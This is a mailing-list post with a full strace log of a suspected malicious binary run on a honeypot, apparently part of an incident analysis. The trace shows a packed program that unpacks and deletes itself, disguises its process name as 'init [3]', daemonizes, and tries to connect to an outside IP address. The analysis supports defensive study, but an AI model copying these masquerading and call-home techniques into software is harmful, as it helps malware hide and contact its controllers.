On Tue, 21 Jun 2005 20:32:14 +0200
Olaf Rempel <[EMAIL PROTECTED]> wrote:

> Executed on a honeypot and traced with strace (full strace attached):
*sigh*

[EMAIL PROTECTED] /tmp# strace -fF ./bla
execve("./bla", ["./bla"], [/* 22 vars */]) = 0
getpid()                                = 526
open("/proc/526/exe", O_RDONLY)         = 3
lseek(3, 1508, SEEK_SET)                = 1508
read(3, "\26\246\216X\344<\0\0\344<\0\0", 12) = 12
gettimeofday({1119378022, 214458}, NULL) = 0
unlink("/tmp/upxAXG0XDQAAQO")           = -1 ENOENT (No such file or directory)
open("/tmp/upxAXG0XDQAAQO", O_WRONLY|O_CREAT|O_EXCL, 0700) = 4
ftruncate(4, 15588)                     = 0
old_mmap(NULL, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40000000
read(3, "\344<\0\0r\36\0\0", 8)         = 8
read(3, "\177?d\371\177ELF\1\0\2\0\3\0\r\340\221\4\375o\263\335"..., 7794) = 7794
write(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0\340\221"..., 15588) = 15588
read(3, "\0\0\0\0UPX!", 8)              = 8
munmap(0x40000000, 20480)               = 0
close(4)                                = 0
close(3)                                = 0
open("/tmp/upxAXG0XDQAAQO", O_RDONLY)   = 3
access("/proc/526/fd/3", R_OK|X_OK)     = 0
unlink("/tmp/upxAXG0XDQAAQO")           = 0
fcntl(3, F_SETFD, FD_CLOEXEC)           = 0
execve("/proc/526/fd/3", ["./bla"], [/* 22 vars */]) = 0
brk(0)                                  = 0x804dba4
open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=12266, ...}) = 0
old_mmap(NULL, 12266, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40016000
close(3)                                = 0
open("/lib/libc.so.6", O_RDONLY)        = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360Y\1"..., 1024) = 1024
fstat64(3, {st_mode=S_IFREG|0755, st_size=1262160, ...}) = 0
old_mmap(NULL, 1243008, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40019000
mprotect(0x40142000, 26496, PROT_NONE)  = 0
old_mmap(0x40142000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x128000) = 0x40142000
old_mmap(0x40146000, 10112, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40146000
close(3)                                = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40149000
munmap(0x40016000, 12266)               = 0
brk(0)                                  = 0x804dba4
brk(0x804eba4)                          = 0x804eba4
brk(0)                                  = 0x804eba4
brk(0x804f000)                          = 0x804f000
open("/dev/urandom", O_RDONLY)          = 3
fstat64(3, {st_mode=S_IFCHR|0644, st_rdev=makedev(1, 9), ...}) = 0
ioctl(3, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbffffa40) = -1 EINVAL (Invalid argument)
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000
read(3, "\22G\257\344\6dW\23i\236\2753\10\331\364I0?\0057\301\37"..., 4096) = 4096
close(3)                                = 0
munmap(0x40016000, 4096)                = 0
open("/var/run/ehttpd.pid", O_RDONLY)   = -1 ENOENT (No such file or directory)
open("/dev/null", O_RDONLY|O_NONBLOCK|O_DIRECTORY) = -1 ENOTDIR (Not a directory)
open("/proc", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 3
fstat64(3, {st_mode=S_IFDIR|0555, st_size=0, ...}) = 0
fcntl64(3, F_SETFD, FD_CLOEXEC)         = 0
getuid32()                              = 0
getpid()                                = 526
getdents64(3, /* 35 entries */, 1024)   = 1024
getdents64(3, /* 19 entries */, 1024)   = 456
stat64("/proc/1", {st_mode=S_IFDIR|0555, st_size=0, ...}) = 0
open("/proc/1/cmdline", O_RDONLY)       = 4
fstat64(4, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000
read(4, "init [3]\0\0\0\0\0\0\0\0\0\0\0\0", 8192) = 20
read(4, "", 8192)                       = 0
close(4)                                = 0
munmap(0x40016000, 4096)                = 0
close(3)                                = 0
execve("/proc/self/exe", ["init [3]"], [/* 23 vars */]) = 0
brk(0)                                  = 0x804dba4
open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=12266, ...}) = 0
old_mmap(NULL, 12266, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40016000
close(3)                                = 0
open("/lib/libc.so.6", O_RDONLY)        = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360Y\1"..., 1024) = 1024
fstat64(3, {st_mode=S_IFREG|0755, st_size=1262160, ...}) = 0
old_mmap(NULL, 1243008, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40019000
mprotect(0x40142000, 26496, PROT_NONE)  = 0
old_mmap(0x40142000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x128000) = 0x40142000
old_mmap(0x40146000, 10112, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40146000
close(3)                                = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40149000
munmap(0x40016000, 12266)               = 0
brk(0)                                  = 0x804dba4
brk(0x804eba4)                          = 0x804eba4
brk(0)                                  = 0x804eba4
brk(0x804f000)                          = 0x804f000
open("/dev/urandom", O_RDONLY)          = 3
fstat64(3, {st_mode=S_IFCHR|0644, st_rdev=makedev(1, 9), ...}) = 0
ioctl(3, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbffffa30) = -1 EINVAL (Invalid argument)
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000
read(3, "\177M\342\\\177=CV\273\216v\225\253\241\322J\346Z\273\340"..., 4096) = 4096
close(3)                                = 0
munmap(0x40016000, 4096)                = 0
open("/var/run/ehttpd.pid", O_RDONLY)   = -1 ENOENT (No such file or directory)
unlink("init [3]")                      = -1 ENOENT (No such file or directory)
rt_sigaction(SIGALRM, {0x80499d4, [ALRM], SA_RESTORER|SA_RESTART, 0x400425f8}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGPIPE, {SIG_IGN}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGCHLD, {0x80499a4, [CHLD], SA_RESTORER|SA_RESTART, 0x400425f8}, {SIG_DFL}, 8) = 0
fork(Process 527 attached (waiting for parent)
Process 527 resumed (parent 526 ready)
)                                  = 527
[pid   527] close(1075075508 <unfinished ...>
[pid   526] exit_group(0)               = ?
[pid   527] <... close resumed> )       = -1 EBADF (Bad file descriptor)
open("/dev/null", O_RDONLY)             = 3
dup2(3, 0)                              = 0
dup2(3, 1)                              = 1
dup2(3, 2)                              = 2
open("/var/run/ehttpd.pid", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 4
getpid()                                = 527
fstat64(4, {st_mode=S_IFREG|0600, st_size=0, ...}) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000
write(4, "527", 3)                      = 3
close(4)                                = 0
munmap(0x40016000, 4096)                = 0
chdir("/")                              = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
gettimeofday({1119378022, 370028}, NULL) = 0
getpid()                                = 527
open("/etc/resolv.conf", O_RDONLY)      = 5
fstat64(5, {st_mode=S_IFREG|0644, st_size=81, ...}) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000
read(5, "search lan\n#nameserver 127.0.0.1"..., 4096) = 81
read(5, "", 4096)                       = 0
close(5)                                = 0
munmap(0x40016000, 4096)                = 0
connect(4, {sa_family=AF_INET, sin_port=htons(4963), sin_addr=inet_addr("210.169.91.66")}, 16) = -1 ECONNREFUSED (Connection refused)
close(4)                                = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigaction(SIGCHLD, NULL, {0x80499a4, [CHLD], SA_RESTORER|SA_RESTART, 0x400425f8}, 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
nanosleep({30, 0},  <unfinished ...>
Process 527 detached

_______________________________________________
tsl-discuss mailing list
[email protected]
http://lists.trustix.org/mailman/listinfo/tsl-discuss
